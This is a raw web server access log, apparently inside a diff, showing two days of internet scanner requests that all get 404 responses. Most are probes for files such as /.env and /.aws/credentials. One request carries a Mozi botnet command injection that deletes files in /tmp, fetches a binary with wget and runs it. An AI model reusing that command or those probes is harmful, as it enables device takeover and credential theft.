1673/1948] 103.48.71.250 () {32 vars in 464 bytes} [Sat Feb 19 02:42:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1674/1949] 81.17.24.154 () {40 vars in 627 bytes} [Sat Feb 19 03:18:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1675/1950] 89.248.165.245 () {36 vars in 563 bytes} [Sat Feb 19 03:23:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1676/1951] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 03:29:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1677/1952] 107.189.6.200 () {28 vars in 310 bytes} [Sat Feb 19 04:09:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1678/1953] 107.189.6.200 () {40 vars in 669 bytes} [Sat Feb 19 04:09:34 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1679/1954] 222.186.19.235 () {30 vars in 521 bytes} [Sat Feb 19 05:01:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 121/1955] 222.186.19.235 () {30 vars in 508 bytes} [Sat Feb 19 05:01:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1680/1956] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 05:24:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1681/1957] 103.207.42.178 () {36 vars in 590 bytes} [Sat Feb 19 05:32:45 2022] GET /.env 
=> generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1682/1958] 103.207.42.178 () {40 vars in 697 bytes} [Sat Feb 19 05:32:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1683/1959] 45.134.225.16 () {40 vars in 628 bytes} [Sat Feb 19 05:51:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1684/1960] 128.14.134.170 () {34 vars in 488 bytes} [Sat Feb 19 06:56:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1685/1961] 107.189.5.162 () {28 vars in 310 bytes} [Sat Feb 19 07:45:49 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1686/1962] 107.189.5.162 () {40 vars in 669 bytes} [Sat Feb 19 07:45:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1687/1963] 192.241.213.133 () {34 vars in 425 bytes} [Sat Feb 19 08:59:29 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1688/1964] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 10:04:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1689/1965] 130.211.54.158 () {42 vars in 563 bytes} [Sat Feb 19 10:10:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1690/1966] 185.173.35.53 () {30 vars in 451 bytes} [Sat Feb 19 11:01:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1691/1967] 
160.20.202.103 () {32 vars in 471 bytes} [Sat Feb 19 11:48:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1692/1968] 184.105.247.196 () {28 vars in 309 bytes} [Sat Feb 19 12:08:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1693/1969] 106.75.218.250 () {30 vars in 329 bytes} [Sat Feb 19 12:52:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1694/1970] 103.203.56.1 () {32 vars in 398 bytes} [Sat Feb 19 12:58:32 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1695/1971] 188.253.34.249 () {32 vars in 471 bytes} [Sat Feb 19 13:07:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1696/1972] 38.242.212.192 () {40 vars in 568 bytes} [Sat Feb 19 13:49:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1697/1973] 124.89.90.53 () {32 vars in 476 bytes} [Sat Feb 19 14:00:49 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 29/1974] 124.89.90.53 () {32 vars in 476 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 30/1975] 124.89.90.53 () {32 vars in 485 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 1698/1976] 124.89.90.53 () {32 vars in 470 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1699/1977] 124.89.90.53 () {22 vars in 273 bytes} [Sat Feb 19 14:00:49 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1700/1978] 124.89.90.53 () {32 vars in 467 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1701/1979] 124.89.90.53 () {32 vars in 473 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.123cha.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1702/1980] 124.89.90.53 () {32 vars in 470 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.baidu.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1703/1981] 124.89.90.53 () {32 vars in 464 bytes} [Sat Feb 19 14:00:54 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1704/1982] 129.232.212.130 () {36 vars in 525 bytes} [Sat Feb 19 14:25:56 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1705/1983] 129.232.212.130 () {40 vars in 632 bytes} [Sat Feb 19 14:25:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1706/1984] 124.121.127.217 () {34 vars in 517 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1707/1985] 
124.121.127.217 () {34 vars in 524 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1708/1986] 124.121.127.217 () {34 vars in 518 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1709/1987] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 15:35:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1710/1988] 151.238.10.209 () {32 vars in 471 bytes} [Sat Feb 19 17:09:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1711/1989] 151.238.10.209 () {32 vars in 465 bytes} [Sat Feb 19 17:09:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.94.138.46 client_port: 49344] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1712/1990] 167.94.138.46 () {24 vars in 264 bytes} [Sat Feb 19 17:16:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1713/1991] 167.94.138.46 () {30 vars in 400 bytes} [Sat Feb 19 17:16:43 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1714/1992] 167.94.138.46 () {22 vars in 234 bytes} [Sat Feb 19 17:16:44 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1715/1993] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 17:25:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1716/1994] 178.32.197.92 () {36 vars in 
542 bytes} [Sat Feb 19 17:28:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1717/1995] 193.118.53.202 () {34 vars in 488 bytes} [Sat Feb 19 17:58:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1718/1996] 188.165.87.102 () {36 vars in 565 bytes} [Sat Feb 19 18:30:04 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1719/1997] 187.85.6.45 () {32 vars in 468 bytes} [Sat Feb 19 18:43:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 122/1998] 209.17.97.114 () {30 vars in 410 bytes} [Sat Feb 19 19:16:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1720/1999] 190.109.170.21 () {32 vars in 465 bytes} [Sat Feb 19 19:44:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1721/2000] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 21:48:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1722/2001] 77.89.199.238 () {32 vars in 463 bytes} [Sat Feb 19 23:04:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1723/2002] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 23:18:16 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1724/2003] 47.102.140.179 () {34 vars in 460 bytes} [Sun Feb 20 00:26:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1725/2004] 192.241.201.126 () {34 vars in 419 bytes} [Sun Feb 20 00:36:14 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1726/2005] 1.13.189.96 () {34 vars in 367 bytes} [Sun Feb 20 01:20:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1727/2006] 81.16.255.42 () {32 vars in 462 bytes} [Sun Feb 20 01:54:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1728/2007] 176.107.188.190 () {36 vars in 466 bytes} [Sun Feb 20 02:55:31 2022] GET /.aws/credentials => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1729/2008] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 03:10:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1730/2009] 101.133.136.70 () {22 vars in 235 bytes} [Sun Feb 20 03:20:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 123/2010] 101.133.136.70 () {22 vars in 297 bytes} [Sun Feb 20 03:20:43 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1731/2011] 101.133.136.70 () {22 vars in 239 bytes} [Sun Feb 20 03:20:49 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1732/2012] 101.133.136.70 () {22 vars in 238 bytes} [Sun Feb 20 03:20:51 2022] OPTIONS / => generated 179 bytes in 2 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 59/2013] 101.133.136.70 () {40 vars in 483 bytes} [Sun Feb 20 03:20:51 
2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1733/2014] 18.237.51.91 () {30 vars in 456 bytes} [Sun Feb 20 03:41:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1734/2015] 45.180.170.221 () {32 vars in 464 bytes} [Sun Feb 20 05:20:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1735/2016] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 05:28:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1736/2017] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 05:31:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1737/2018] 154.209.125.39 () {34 vars in 459 bytes} [Sun Feb 20 07:10:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1738/2019] 192.241.205.177 () {34 vars in 395 bytes} [Sun Feb 20 07:30:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1739/2020] 183.136.115.159 () {30 vars in 438 bytes} [Sun Feb 20 07:34:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1740/2021] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 09:22:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1741/2022] 65.49.20.69 () {28 vars in 305 bytes} [Sun Feb 20 09:46:05 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1742/2023] 47.104.136.57 
() {36 vars in 458 bytes} [Sun Feb 20 09:46:59 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 124/2024] 101.133.148.169 () {32 vars in 504 bytes} [Sun Feb 20 09:47:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1743/2025] 193.118.53.202 () {34 vars in 488 bytes} [Sun Feb 20 09:51:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1744/2026] 34.140.248.32 () {42 vars in 564 bytes} [Sun Feb 20 09:55:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1745/2027] 212.120.209.44 () {32 vars in 464 bytes} [Sun Feb 20 10:38:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1746/2028] 141.8.79.77 () {28 vars in 304 bytes} [Sun Feb 20 11:26:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1747/2029] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 11:35:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1748/2030] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 12:02:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1749/2031] 109.72.243.104 () {32 vars in 465 bytes} [Sun Feb 20 15:13:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1750/2032] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 15:49:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) 
+[pid: 19148|app: 0|req: 1751/2033] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 16:31:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1752/2034] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 17:12:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1753/2035] 120.85.116.194 () {34 vars in 642 bytes} [Sun Feb 20 18:10:19 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1754/2036] 164.90.197.30 () {36 vars in 481 bytes} [Sun Feb 20 18:15:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1755/2037] 128.14.134.170 () {34 vars in 488 bytes} [Sun Feb 20 19:31:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1756/2038] 164.92.201.252 () {22 vars in 233 bytes} [Sun Feb 20 19:42:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1757/2039] 62.171.149.200 () {40 vars in 672 bytes} [Sun Feb 20 20:12:36 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1758/2040] 47.102.98.20 () {40 vars in 605 bytes} [Sun Feb 20 20:20:10 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1759/2041] 47.102.98.20 () {38 vars in 598 bytes} [Sun Feb 20 20:20:10 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 
0|req: 1760/2042] 151.243.110.168 () {36 vars in 523 bytes} [Sun Feb 20 21:05:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1761/2043] 192.241.196.173 () {34 vars in 429 bytes} [Sun Feb 20 21:14:59 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1762/2044] 141.101.229.61 () {32 vars in 464 bytes} [Sun Feb 20 21:36:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1763/2045] 20.55.53.144 () {34 vars in 495 bytes} [Sun Feb 20 21:57:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1764/2046] 185.245.62.226 () {28 vars in 311 bytes} [Sun Feb 20 22:00:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1765/2047] 185.245.62.226 () {40 vars in 671 bytes} [Sun Feb 20 22:00:11 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1766/2048] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 22:10:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1767/2049] 209.17.96.106 () {30 vars in 410 bytes} [Sun Feb 20 22:40:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1768/2050] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 23:12:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1769/2051] 45.134.144.134 () {32 vars in 437 bytes} [Sun Feb 20 23:27:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 
404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1770/2052] 106.12.3.163 () {32 vars in 397 bytes} [Sun Feb 20 23:48:03 2022] GET /users/sign_in => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1771/2053] 20.151.201.9 () {36 vars in 499 bytes} [Mon Feb 21 00:02:05 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1772/2054] 192.241.213.83 () {34 vars in 418 bytes} [Mon Feb 21 00:15:45 2022] GET /manager/html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1773/2055] 47.101.130.170 () {34 vars in 432 bytes} [Mon Feb 21 00:35:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1774/2056] 193.118.53.202 () {34 vars in 488 bytes} [Mon Feb 21 00:37:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1775/2057] 164.90.201.191 () {32 vars in 440 bytes} [Mon Feb 21 00:54:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1776/2058] 189.127.145.212 () {32 vars in 465 bytes} [Mon Feb 21 01:05:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1777/2059] 199.168.97.179 () {32 vars in 391 bytes} [Mon Feb 21 01:06:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1778/2060] 101.133.136.70 () {22 vars in 235 bytes} [Mon Feb 21 01:24:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1779/2061] 101.133.136.70 () {22 vars in 297 bytes} 
[Mon Feb 21 01:24:24 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1780/2062] 101.133.136.70 () {22 vars in 238 bytes} [Mon Feb 21 01:24:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1781/2063] 101.133.136.70 () {22 vars in 239 bytes} [Mon Feb 21 01:24:36 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1782/2064] 101.133.136.70 () {40 vars in 485 bytes} [Mon Feb 21 01:24:40 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1783/2065] 47.92.6.234 () {34 vars in 457 bytes} [Mon Feb 21 01:34:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1784/2066] 178.93.10.105 () {32 vars in 470 bytes} [Mon Feb 21 01:56:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1785/2067] 45.87.63.11 () {36 vars in 537 bytes} [Mon Feb 21 02:41:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1786/2068] 54.190.35.204 () {34 vars in 499 bytes} [Mon Feb 21 02:47:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1787/2069] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 21 02:58:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-21 03:07:07 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! 
